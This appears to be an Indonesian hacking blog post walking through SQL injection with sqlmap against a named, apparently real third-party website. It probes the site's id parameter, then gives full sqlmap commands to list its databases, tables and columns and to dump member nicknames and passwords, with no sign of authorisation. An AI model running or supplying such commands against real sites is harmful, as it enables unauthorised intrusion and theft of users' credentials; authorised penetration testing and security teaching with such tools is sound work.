{ IndoSec }

Create, Securing, and Exploit

Kamis, 27 Desember 2018

SQL Injection Dengan Sqlmap

l

Assalamualaikum wr wb hallo guys kembali bersama saya, disini saya akan memberikan tutorial SQLi Injection Dengan SQLMAP, sebelumnya udh ada yang tau itu tools sqlmap ???, kalau tidak cek aja wikipedia :")
lagsung saja cekidot

  1. Pertama install dulu sqlmap nya, kebetulan saya pengguna linux tinggal ketik aja di terminal "sudo apt-get install sqlmap" (hilangkan tanda petiknya), untuk download  dan cara install nya kunjungi di web resmi ya http://sqlmap.org/
  2. sudah terinstall tinggal jalankan sqlmap saja di terminal (berikut tampilannya)
     
  3. ketika sudah selesai semua, selanjutnya kita cari target hmm yang mana ya targetnya saya sudah siapkan  https://avachara.com/avatar/fs_detail.php?id=100 ini target kita untuk mencari letak vuln SQLi nya kita tambahkan string di belakang angka  https://avachara.com/avatar/fs_detail.php?id=100' dan kita enter hasilnya vuln !!! :")
  4. selanjutnya buka sqlmap dan ketiklah sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 --dbs --risk=3 --level=3, kita tunggu dan boom!! kita mendapatkan database nya
  5. selanjutnya kita dump table nya dengan cara sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 -D dak2_avachara --table --risk=3 --level=3, hasilnya !!
     
  6. next kita pilih table dan dump column nya dengan cara sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 -D dak2_avachara -T dakmember --column --risk=3 --level=3, nah dia akan tercetak columnya
  7. selanjutnya kita akan dump data kita akan dump username and password dengan cara sudo sqlmap -u https://avachara.com/avatar/fs_detail.php?id=100 -D dak2_avachara -T dakmember -C nickname,password --dump  --risk=3 --level=3, hasil nya tara !!!
  8. segitu aja nih tutorialnya untuk lebih lengkapnya kunjungi git hub nya https://github.com/sqlmapproject/sqlmap dan web nya http://sqlmap.org/ disana banyak referensinya silahkan baca baca terima kasih

Sekian dari saya silahkan kunjungi fanspage kami untuk melihat informasi atau tips and trik lainnya terima kasih
wassalamualikum wr wb

Tidak ada komentar:

Posting Komentar

Popular Posts